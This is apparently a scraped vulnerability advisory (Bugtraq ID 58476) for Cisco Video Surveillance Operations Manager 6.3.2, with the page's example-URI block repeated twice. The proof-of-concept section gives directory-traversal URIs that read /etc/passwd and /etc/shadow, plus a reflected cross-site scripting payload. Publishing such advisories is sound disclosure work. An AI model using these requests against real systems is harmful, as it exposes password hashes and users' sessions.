Cisco Video Surveillance Operations Manager Multiple Security Vulnerabilities
BID:58476
Info
Cisco Video Surveillance Operations Manager Multiple Security Vulnerabilities
| Bugtraq ID: | 58476 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 13 2013 12:00AM |
| Updated: | Mar 13 2013 12:00AM |
| Credit: | b.saleh |
| Vulnerable: |
Cisco Video Surveillance Operations Manager 6.3.2 |
| Not Vulnerable: | |
Exploit / POC
Cisco Video Surveillance Operations Manager Multiple Security Vulnerabilities
An attacker can exploit some of these issues with a browser. To exploit a cross-site scripting issue the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow
http://www.example.com/monitor/logselect.php
http://www.example.com/broadware.jsp
http://www.example.com/vsom/index.php/"/title><script>alert("ciscoxss");</script>
An attacker can exploit some of these issues with a browser. To exploit a cross-site scripting issue the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow
http://www.example.com/monitor/logselect.php
http://www.example.com/broadware.jsp
http://www.example.com/vsom/index.php/"/title><script>alert("ciscoxss");</script>
References
Cisco Video Surveillance Operations Manager Multiple Security Vulnerabilities
References:
References: